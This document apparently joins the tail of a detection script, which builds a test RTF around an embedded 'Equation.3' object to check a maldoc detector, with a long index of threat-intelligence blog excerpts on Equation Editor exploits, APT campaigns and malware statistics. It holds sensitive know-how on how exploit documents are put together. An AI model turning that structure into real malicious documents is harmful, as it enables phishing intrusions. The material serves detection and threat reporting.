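    return (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
            b"{\\*\\objdata " + hexdata + b"}}}")
```

In practice the DOCX check runs on the attachment and the RTF check on whatever the template URL serves; a file flagged by either stage is worth detonating, and the CLSID match is the one that survives `\objclass` obfuscation.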
Securelist
Cloud Atlas seen using a new tool in its attacks
blogs_securelist·2024-12-23·CVSS 7.8
[HIGH] Cloud Atlas seen using a new tool in its attacks
Table of Contents
Introduction
Technical details
HTA
VBShower
VBShower::Launcher
VBShower::Cleaner
VBShower::Backdoor
VBShower::Payload
PowerShower
VBCloud
Geography of attacked users
Conclusion
Indicators of compromise
Authors
Oleg Kupreev
## Introduction
Known since 2014, Cloud Atlas targets Eastern Europe and Central Asia. We’re shedding light on a previously undocumented toolset, which the group used heavily in 2024. Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor ( CVE-2018-0802 ) to download and execute malware code. See below for the infection pattern.
Typical Cloud Atlas infection pattern
When opened, the document downloads a malicious template formatted as an RTF file from a remote serv
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Securelist
Analyzing the vulnerability landscape in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Analyzing the vulnerability landscape in Q3 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Securelist
Exploits and vulnerabilities in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Exploits and vulnerabilities in Q2 2024
Table of Contents
Statistics on registered vulnerabilities
Vulnerability exploitation statistics
Windows and Linux vulnerability exploitation
Most common exploits
Vulnerability exploitation in APT attacks
Exploiting vulnerable drivers to attack operating systems
BYOVD attack tools
Interesting vulnerabilities
CVE-2024-26169 (WerKernel.sys)
CVE-2024-26229 (csc.sys)
CVE-2024-4577 (PHP CGI)
Takeaways and recommendations
Authors
Vitaly Morgunov
Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not h
Securelist
Analyzing the vulnerability landscape in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Analyzing the vulnerability landscape in Q2 2024
Table of Contents
- Statistics on registered vulnerabilities
- Vulnerability exploitation statistics
- Vulnerability exploitation in APT attacks
- Exploiting vulnerable drivers to attack operating systems
- Interesting vulnerabilities
- CVE-2024-26169 (WerKernel.sys)
- CVE-2024-26229 (csc.sys)
- CVE-2024-4577 (PHP CGI)
- Takeaways and recommendations
Authors
- Vitaly Morgunov
- Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to t
Securelist
Spam and phishing in 2023
blogs_securelist·2024-03-07
Spam and phishing in 2023
Table of Contents
The year in figures
Phishing and scams in 2023
Hunting gamers
Out-of-the-blue winnings and refunds
Easy money
Cryptocurrency scams
Reeling in readers
Social networks and instant messaging under attack
Beating two-factor authentication
Artificial intelligence at the service of scammers
Spam in 2023
Scams
Cryptocurrency scams
Charity scams
Blackmail
Malicious attachments
List linking
Spear phishing and BEC attacks in 2023
Other email phishing trends in 2023
Obfuscation
QR codes
IPFS
Statistics: spam
Share of spam in email traffic
Countries and territories where spam originated
Malicious email attachments
Countries and territories targeted by malicious mailings
Statistics: phishing
Map of phishing attacks
Top-level domains
Organizations targete
Securelist
Kaspersky spam and phishing report for 2023
blogs_securelist·2024-03-07
Kaspersky spam and phishing report for 2023
Table of Contents
- The year in figures
- Phishing and scams in 2023
- Spam in 2023
- Spear phishing and BEC attacks in 2023
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Tatyana Kulikova
- Olga Altukhova
- Andrey Kovtun
- Irina Shimko
- Roman Dedenok
## The year in figures
- 45.60% of all email sent worldwide and 46.59% of all email sent in the Runet (the Russian web segment) was spam
- 31.45% of all spam email was sent from Russia
- Kaspersky Mail Anti-Virus blocked 135,980,457 malicious email attachments
- Our Anti-Phishing system thwarted 709,590,011 attempts to follow phishing links
- SafeMessaging feature in Kaspersky mobile solutions prevented more than 62,000 redirects via phishing links from Telegram
## Phishing and scams in 2023
### Hunting gamers
In 2
Checkpoint
12th February – Threat Intelligence Report
blogs_checkpoint·2024-02-12
CVE-2022-42475 12th February – Threat Intelligence Report
## 12th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 12th February, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
One of the largest unions in California, Service Employees International Union (SEIU) Local 1000, has confirmed a ransomware attack that led to network disruption. The LockBit ransomware gang has assumed responsibility, claiming to have stolen 308GB of data including sensitive employee information such as Social Securit
Checkpoint
Maldocs of Word and Excel: Vigor of the Ages
blogs_checkpoint·2024-02-08·CVSS 7.8
CVE-2017-11882 [HIGH] Maldocs of Word and Excel: Vigor of the Ages
## Maldocs of Word and Excel: Vigor of the Ages
Research by: Raman Ladutska
We chose a fantasy decoration style at certain points of the article to attract attention to the described proble
Securelist
PC malware statistics, Q3 2023
blogs_securelist·2023-12-01
PC malware statistics, Q3 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2023:
- Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe.
- A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus
Securelist
IT threat evolution in Q3 2023. Non-mobile statistics
blogs_securelist·2023-12-01
IT threat evolution in Q3 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Vulnerability exploitation
More attacks on healthcare
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT honeypots
Attacks via web resources
Countries and territories that serve as sourc
Fortinet
New Agent Tesla Variant Being Spread by Crafted Excel Document | FortiGuard Labs
blogs_fortinet·2023-09-05·CVSS 7.8
[HIGH] New Agent Tesla Variant Being Spread by Crafted Excel Document | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New Agent Tesla Variant Being Spread by Crafted Excel Document
By Xiaopeng Zhang | September 05, 2023
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Collects sensitive information from a victim’s computer
Severity level: Critical
Our FortiGuard Labs captured a phishing campaign that spreads a new Agent Tesla variant. This well-known malware family uses a .Net-based Remote Access Trojan (RAT) and data stealer to gain initial access. It is often used for Malware-as-a-Service (MaaS).
I performed an in-depth analysis of this campaign, from the initial phishing email to the actions of Agent Tesla installed on the victim’s machine to the collecting of sensitive information from the affected device. In this analysis, you will lear
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Securelist
IT threat evolution in Q2 2023. Non-mobile statistics
blogs_securelist·2023-08-30
IT threat evolution in Q2 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
MOVEit Transfer vulnerabilities exploited
Attacks on municipal organizations, educational and healthcare establishments
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT
Securelist
PC malware statistics, Q2 2022
blogs_securelist·2023-08-30
PC malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2023
- IT threat evolution in Q2 2023. Non-mobile statistics
- IT threat evolution in Q2 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2023:
- Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe.
- A total of 209,716,810 unique links were d
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Securelist
Non-mobile malware statistics, Q1 2023
blogs_securelist·2023-06-07
Non-mobile malware statistics, Q1 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2023
- IT threat evolution in Q1 2023. Non-mobile statistics
- IT threat evolution in Q1 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2023:
- Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
- Web Anti-Virus detected 246,912,694 unique URLs.
- Attempts to run malware fo
Securelist
IT threat evolution in Q1 2023. Non-mobile statistics
blogs_securelist·2023-06-07
IT threat evolution in Q1 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Attacks on Linux and VMWare ESXi servers
Progress in combating cybercrime
Conti-based Trojan decrypted
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries/territories
Securelist
Spam and phishing in 2022
blogs_securelist·2023-02-16
Spam and phishing in 2022
Table of Contents
Figures of the year
Phishing in 2022
Last year’s resonant global events
The pandemic
Crypto phishing and crypto scams
Compensation, bonus, and paid survey scams
Fake online stores and large vendor phishing
Hijacking of social media accounts
Spam in 2022
The pandemic
Contact form spam
Blackmail in the name of law enforcement agencies
Exploiting the news
Spam with malicious attachments
Two-stage spear phishing using a known phish kit
Statistics
How a phishing campaign unfolds
Victims
Statistics: spam
Share of spam in mail traffic
Countries and territories — sources of spam
Malicious mail attachments
Countries and territories targeted by malicious mailings
Statistics: phishing
Map of phishing attacks
Top-level domains
Organizations under phishing a
Securelist
Kaspersky's 2022 spam and phishing report
blogs_securelist·2023-02-16
Kaspersky's 2022 spam and phishing report
Table of Contents
- Figures of the year
- Phishing in 2022
- Spam in 2022
- Two-stage spear phishing using a known phish kit
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Tatyana Kulikova
- Roman Dedenok
- Olga Altukhova
- Andrey Kovtun
- Irina Shimko
## Figures of the year
In 2022:
- 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam
- As much as 29.82% of all spam emails originated in Russia
- Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments
- Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links
- 378,496 attempts to follow phishing links were associated with Telegram account hijacking
## Phishing in 2022
### Last year’s resonant global events
The
Checkpoint
Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine
blogs_checkpoint·2022-12-09
CVE-2017-11882 Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine
## Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine
## Introduction
Cloud Atlas (or Inception) is a cyber-espionage group. Since its discovery in 2014, th
Securelist
IT threat evolution in Q3 2022. Non-mobile statistics
blogs_securelist·2022-11-18
IT threat evolution in Q3 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Number of users attacked by banking malware
TOP 10 banking malware families
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
TOP 20 threats for macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries and territories that serve as sources of web-ba
Securelist
PC malware statistics, Q3 2022
blogs_securelist·2022-11-18
PC malware statistics, Q3 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2022
- IT threat evolution in Q3 2022. Non-mobile statistics
- IT threat evolution in Q3 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2022:
- Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
- Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
- Attempts to run malware fo
Fortinet
A Tale of PivNoxy and Chinoxy Puppeteer | FortiGuard Labs
blogs_fortinet·2022-08-22·CVSS 7.8
[HIGH] A Tale of PivNoxy and Chinoxy Puppeteer | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
A Tale of PivNoxy and Chinoxy Puppeteer
By Shunichi Imano and Fred Gutierrez | August 22, 2022
Recently, a simple and short email with a suspicious RTF attachment that had been sent to a telecommunications agency in South Asia caught the attention of FortiGuard Labs. The email was disguised as having come from a Pakistan government division and delivered the PivNoxy malware.
Affected Platforms: Windows
Impacted Parties: Windows users
Impact: Controls victim’s machine and collects sensitive information
Severity Level: Medium
This blog describes how the attack works, suggests who the threat actor behind the operation might be, and details the techniques used by the attacker.
Attack Overview
The attack started with a simple email that included a bare doc
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now
blogs_tenable·2022-08-19
Cybersecurity Snapshot: 6 Things That Matter Right Now
Securelist
IT threat evolution in Q2 2022. Non-mobile statistics
blogs_securelist·2022-08-15
IT threat evolution in Q2 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
TOP 10 countries and territories that serve as sources of web-based attacks
Countries and territories where users faced the greatest risk of online infection
Local threat
Securelist
Non-mobile malware statistics, Q2 2022
blogs_securelist·2022-08-15
Non-mobile malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2022
- IT threat evolution in Q2 2022. Non-mobile statistics
- IT threat evolution in Q2 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2022:
- Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.
- Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware fo
Tenable
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
blogs_tenable·2022-08-04
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
Securelist
IT threat evolution in Q1 2022. Non-mobile statistics
blogs_securelist·2022-05-27
IT threat evolution in Q1 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
TOP 10 banking malware families
Ransomware programs
Quarterly trends and highlights
Law enforcement successes
HermeticWiper, HermeticRansom and RUransom, etc.
Conti source-code leak
Attacks on NAS devices
Maze Decryptor
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarter highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat
Securelist
PC malware statistics, Q1 2022
blogs_securelist·2022-05-27
PC malware statistics, Q1 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2022
- IT threat evolution in Q1 2022. Non-mobile statistics
- IT threat evolution in Q1 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2022:
- Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.
- Web Anti-Virus recognized 313,164,030 unique URLs as malicious.
- Attempts to run malware
Talos
Bitter APT adds Bangladesh to their targets
blogs_talos·2022-05-11·CVSS 7.8
[HIGH] Bitter APT adds Bangladesh to their targets
- Cisco Talos has observed an ongoing malicious campaign since August 2021 from the Bitter APT group that appears to target users in Bangladesh, a change from the attackers' usual victims.
- As part of this, there's a new trojan based on Apost Talos is calling "ZxxZ," that, among other features, includes remote file execution capability.
- Based on the similarities between the C2 server in this campaign with that of Bitter's previous campaign, we assess with moderate confidence that this campaign is operated by the Bitter APT group.
### Executive Summary
Cisco Talos discovered an ongoing campaign operated by what we believe is the Bitter APT group since August 2021. This campaign is a typical example of the actor targeting South Asian government entities.
This campaign targets an elite
Talos
Bitter APT adds Bangladesh to their targets
blogs_talos·2022-05-11·CVSS 7.8
[HIGH] Bitter APT adds Bangladesh to their targets
## Bitter APT adds Bangladesh to their targets
Cisco Talos has observed an ongoing malicious campaign since August 2021 from the Bitter APT group that appears to target users in Bangladesh, a change from the attackers' usual victims.
As part of this, there's a new trojan based on Apost Talos is calling "ZxxZ," that, among other features, includes remote file execution capability.
Based on the similarities between the C2 server in this campaign with that of Bitter's previous campaign, we assess with moderate confidence that this campaign is operated by the Bitter APT group.
## Executive Summary
Cisco Talos discovered an ongoing campaign operated by what we believe is the Bitter APT group since August 2021. This campaign is a typical example of the actor targeting South Asian government
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Securelist
Kaspersky spam and phishing report for 2021
blogs_securelist·2022-02-09
Kaspersky spam and phishing report for 2021
Table of Contents
- Figures of the year
- Trends of the year
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Tatyana Kulikova
- Tatyana Shcherbakova
## Figures of the year
In 2021:
- 45.56% of e-mails were spam
- 24.77% of spam was sent from Russia with another 14.12% from Germany
- Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
- The most common malware family found in attachments were Agensla Trojans
- Our Anti-Phishing system blocked 253 365 212 phishing links
- Safe Messaging blocked 341 954 attempts to follow phishing links in messengers
## Trends of the year
### How to make an unprofitable investment with no return
The subject of investments gained significant relevance in 2021, with banks and other organizations actively prom
Securelist
IT threat evolution in Q3 2021. PC statistics
blogs_securelist·2021-11-26
IT threat evolution in Q3 2021. PC statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Attack on Kaseya and the REvil story
The arrival of BlackMatter: DarkSide restored?
Q3 closures
Exploitation of vulnerabilities and new attack methods
Number of new ransomware modifications
Number of users attacked by ransomware Trojans
Geography of ransomware attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by cybercriminals during cyberattacks
Quarter highlights
Statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries tha
Securelist
IT threat evolution in Q3 2021. PC statistics
blogs_securelist·2021-11-26
IT threat evolution in Q3 2021. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Number of users attacked by ransomware Trojans
- Geography of ransomware attacks
- Top 10 most common families of ransomware Trojans
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution Q3 2021
- IT threat evolution in Q3 2021. PC statistics
- IT threat evolution in Q3 2021. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2021:
- Kaspersky solutions blocked 1,098,968,315 attacks from online reso
Securelist
Q3 2021 spam and phishing report
blogs_securelist·2021-11-01
Q3 2021 spam and phishing report
Table of Contents
- Quarterly highlights
- Statistics: spam
- Statistics: phishing
- Takeaways
Authors
- Tatyana Kulikova
- Tatyana Shcherbakova
## Quarterly highlights
### Scamming championship: sports-related fraud
This summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were “official”, despite charging potential victims several times the real price of a ticket, and some just
Securelist
IT threat evolution Q2 2021
blogs_securelist·2021-08-12·CVSS 7.8
[HIGH] IT threat evolution Q2 2021
Table of Contents
- Targeted attacks
- Other malware
Authors
- David Emm
## Targeted attacks
### The leap of a Cycldek-related threat actor
It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be side-loaded by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of LuckyMouse, but we have observed other groups using similar “triads”, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.
We recently described one such file, called “FoundCore”, which caught our atte
Securelist
IT threat evolution in Q2 2021. PC statistics
blogs_securelist·2021-08-12
IT threat evolution in Q2 2021. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2021:
- Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.
- Web antivirus recognized 675,832,360 unique URLs as malicious.
- Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.
- Ransomware attacks were defeated on the computers
Securelist
IT threat evolution Q1 2021. Non-mobile statistics
blogs_securelist·2021-05-31
IT threat evolution Q1 2021. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Attack geography
Top 10 most common families of ransomware Trojans
Miners
Number of new modifications
Number of users attacked by miners
Attack geography
Vulnerable applications used by cybercriminals during cyber attacks
Attacks on macOS
Threat geography
IoT attacks
IoT threat statistics
SSH-based attacks
Threats loaded into traps
Attacks via web resources
Countries that are sources of web-based attacks: Top 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Autho
Securelist
IT threat evolution Q1 2021. Non-mobile statistics
blogs_securelist·2021-05-31
IT threat evolution Q1 2021. Non-mobile statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyber attacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2021:
- Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.
- 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.
- Ransomware att
Securelist
The leap of a Cycldek-related threat actor
blogs_securelist·2021-04-05
The leap of a Cycldek-related threat actor
Table of Contents
- Introduction
- FoundCore Loader
- FoundCore payload
- RoyalRoad documents, DropPhone and CoreLoader
- Victimology and attribution
- Conclusion
- Indicators of Compromise
Authors
- Ivan Kwiatkowski
- Pierre Delcher
- Mark Lechtik
## Introduction
In the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be sideloaded by it, and an encoded payload, generally dropped from a self-extracting archive. Initially considered to be the signature of LuckyMouse, we observed other groups starting to use similar “triads” such as HoneyMyte. While it implies that it is not possible to attribute attacks based on this t
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
